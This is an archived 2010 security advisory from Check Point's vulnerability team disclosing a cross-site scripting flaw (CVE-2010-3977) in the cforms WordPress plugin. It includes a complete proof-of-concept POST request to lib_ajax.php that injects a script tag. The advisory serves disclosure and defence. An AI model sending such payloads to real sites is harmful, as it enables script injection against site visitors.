Информационная безопасность
[RU] switch to English

Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  'WSN Links' SQL Injection Vulnerability (CVE-2010-

  Stored XSS vulnerability in Webmedia Explorer

  XSS vulnerability in Kandidat CMS

  XSS vulnerability in Kandidat CMS

From:Rodrigo Branco <rbranco_(at)_checkpoint.com>
Date:2 ноября 2010 г.
Subject:cforms WordPress Plugin Cross Site Scripting Vulnerability - CVE-2010-3977

Dear List,

I'm writing on behalf of the Check Point Vulnerability Discovery Team to publish
the following vulnerability.

Check Point Software Technologies - Vulnerability Discovery Team (VDT)

cforms WordPress Plugin Cross Site Scripting Vulnerability


According to Delicious Days, "cforms is a powerful and feature rich form plugin
for WordPress, offering convenient deployment of multiple Ajax
driven contact forms throughout your blog or even on the same page."

This problem was confirmed in the following versions of the cforms WordPress
Plugin, other versions
maybe also affected.

cforms v11.5

CVSS Scoring System

The CVSS score is: 5.5
       Base Score: 6.7
       Temporal Score: 5.5
We used the following values to calculate the scores:
       Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N
       Temporal score is: E:F/RL:OF/RC:C


A data array is created in lib_ajax.php using values from a form field in a POST
request.  The parameters rs and rsargs are not validated and thus
it is possible to inject code.

POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1
Host: <server>
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv: Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 219
Cookie: wp-settings-
%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;
c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8
2 3 8 8 f 6 = t e s t  ;
Pragma: no-cache
Cache-Control: no-cache
$<script>alert(1)</script>$#[email protected]


This vulnerability has been brought to our attention by Wagner Elias from Conviso
IT Security company (http://www.conviso.com.br) and researched internally by
Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT).

Best Regards,


Rodrigo Rubira Branco
Senior Security Researcher
Vulnerability Discovery Team (VDT)
Check Point Software Technologies

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород